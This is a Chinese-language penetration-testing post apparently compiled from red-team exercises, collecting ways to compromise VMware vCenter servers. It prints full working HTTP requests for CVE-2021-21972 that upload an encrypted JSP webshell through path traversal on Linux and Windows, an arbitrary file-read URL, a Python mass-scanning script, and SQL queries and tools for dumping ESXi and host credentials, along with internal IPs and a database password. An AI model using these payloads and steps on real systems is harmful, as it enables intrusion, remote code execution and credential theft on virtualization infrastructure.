VMware vCenter相关漏洞-tale

前言

前段时间参加了几场hw，在目标系统内网环境中遇到了不少Vmware Vcenter，并在实际环境中收集并总结了相关利用方法。

Struts2命令执行获得VCenter

访问发现该地址
 struts2执行命令
https://ip/statsreport/  https://10.72.0.110/statsreport/instance.jsp https://10.72.0.110/statsreport/timezoone.jsp https://10.72.0.110/statsreport/statsrepr.jsp

VMware vCenter 未授权文件上传RCE

漏洞介绍

Vmware vCenter的vSphere Client组件中存在未经授权任意文件上传以及务服务器端请求伪造（SSRF）漏洞。其中未授权上传漏洞编号为CVE-2021-21972，该漏洞可以上传一个webshell至vcenter服务器的任意位置，获取vcenter服务器的权限。

影响范围

7.0 U1c 之前的 7.0 版本
6.7 U3l 之前的 6.7 版本
6.5 U3n 之前的 6.5 版本

Linux漏洞POC

POST /ui/vropspluginui/rest/services/uploadova HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:85.0) Gecko/20100101 Firefox/85.0
Accept: application/json
Content-Length: 894
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryH8GoragzRFVTw1VD

------WebKitFormBoundaryH8GoragzRFVTw1VD
Content-Disposition: form-data; name="uploadFile"; filename="a.tar"
Content-Type: text/plain

../../usr/lib/vmware-vsphere-ui/server/work/deployer/s/global/42/0/h5ngc.war/resources/0000755000000000000000000000000014015431210027145 5ustar  rootroot../../usr/lib/vmware-vsphere-ui/server/work/deployer/s/global/42/0/h5ngc.war/resources/shell.jsp0000644000000000000000000000117114015430711030777 0ustar  rootroot<%@page import="java.util.*,javax.crypto.*,javax.crypto.spec.*"%><%!class U extends ClassLoader{U(ClassLoader c){super(c);}public Class g(byte []b){return super.defineClass(b,0,b.length);}}%><%if (request.getMethod().equals("POST")){String k="e45e329feb5d925b";session.putValue("u",k);Cipher c=Cipher.getInstance("AES");c.init(2,new SecretKeySpec(k.getBytes(),"AES"));new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(pageContext);}/*1kdnwbry2LyI7pyA*/%>


------WebKitFormBoundaryH8GoragzRFVTw1VD--

windows漏洞POC

POST /ui/vropspluginui/rest/services/uploadova HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:85.0) Gecko/20100101 Firefox/85.0
Accept: application/json
Content-Length: 894
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryH8GoragzRFVTw1VD

------WebKitFormBoundaryH8GoragzRFVTw1VD
Content-Disposition: form-data; name="uploadFile"; filename="a.tar"
Content-Type: text/plain

..\..\ProgramData\VMware\vCenterServer\data\perfcharts\tc-instance\webapps\statsreport\webshell.jsp0000644000000000000000000000102500000000000032532 0ustar00000000000000<%@page import="java.util.*,javax.crypto.*,javax.crypto.spec.*"%><%!class U extends ClassLoader{U(ClassLoader c){super(c);}public Class g(byte []b){return super.defineClass(b,0,b.length);}}%><%if (request.getMethod().equals("POST")){String k="e45e329feb5d925b";session.putValue("u",k);Cipher c=Cipher.getInstance("AES");c.init(2,new SecretKeySpec(k.getBytes(),"AES"));new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(pageContext);}%>

------WebKitFormBoundaryH8GoragzRFVTw1VD--

POC获取的webshell

对于windows或者linux环境下，我们都可以通过写入webshell来进行RCE。

windows默认存放webshell路径：

C:\ProgramData\VMware\vCenterServer\data\perfcharts\tc-instance\webapps\statsreport\webshell.jsp

linux默认存放webshell路径：

/usr/lib/vmware-vsphere-ui/server/work/deployer/s/global/42/0/h5ngc.war/resources/webshell.jsp

当然对于Linux机器还可以选择在SSH开放外联时写入SSH密钥进行控制

VMware vCenter 任意文件读取批量检测

影响范围

6.5u1该漏洞被修复。

poc:windows下访问

http://ip/eam/vib?id=C:\ProgramData\VMware\vCenterServer\cfg\vmware-vpx\vcdb.properties

批量脚本核

备注：经验证有linux的环境，所以加了linux下的简单检测，payload通用

payloads = [r'/eam/vib?id=C:\ProgramData\VMware\vCenterServer\cfg\vmware-vpx\vcdb.properties',r'/eam/vib?id=/etc/passwd']
def http_request(url):
    try:
        print("Trying:" + url + ' ' + '[' + str(left) + '/' + str(countLines) + ']')
        for payload in payloads:
            vulurl = url + payload
            print(vulurl)
            r = requests.get(url=vulurl, timeout=10, verify= False)
            if r.status_code == 200 and ('driver' in r.text or 'root:' in r.text):
                print("\033[1;40;32m[Vuln] {}\033[0m".format(vulurl))
                with open(path_out,'a') as f:
                    f.write(vulurl + '\n')
                    return
            else:
                print("[-]" + "r.status_code:" + str(r.status_code) + "," + "raise.text:" + r.text)
    except Exception as err:
        print(err)

vcenter服务器默认安装路径+数据库配置账密

C:\ProgramData\VMware\vCenterServer\cfg\vmware-vpx\vcdb.properties
 url = jdbc:oracle:thin:@//172.16.129.101:1521/hgvpxdb username = vpxadmin
password = oracle
查询容器数量、ip、名称、镜像地址的sql语句

select * from vpxv_vms

 查询存在ESXI账号和密码的sql语句

select * from vpxv_hosts

vcenter ESXI

访问ESXI,密码虽在上述数据库中，但为加密保存，暂时没想到办法进行密码解密
https://172.16.129.6 

重置vcenter管理控制台密码

该系统为vcenter管理控制台，可通过服务器重置密码，进入（前提拿到该服务器权限）
https://172.16.129.100/ui https://172.16.129.100/ui/saml/websso/sso 

https://blog.csdn.net/weixin_34075551/article/details/91504733  重置密码后可登录

取出虚拟主机内的账号密码

可以进入主机后，下载该工具
https://www.nirsoft.net/utils/network_password_recovery.html  虚拟主机扫描后不能复制，知道mssql的话可以tpye查看

vmware vsphere CVE-2021-21972

http://10.1.0.235/ui/vropspluginui/rest/services/uploadova  利用脚本getshell

参考链接

https://blog.csdn.net/weixin_34075551/article/details/91504733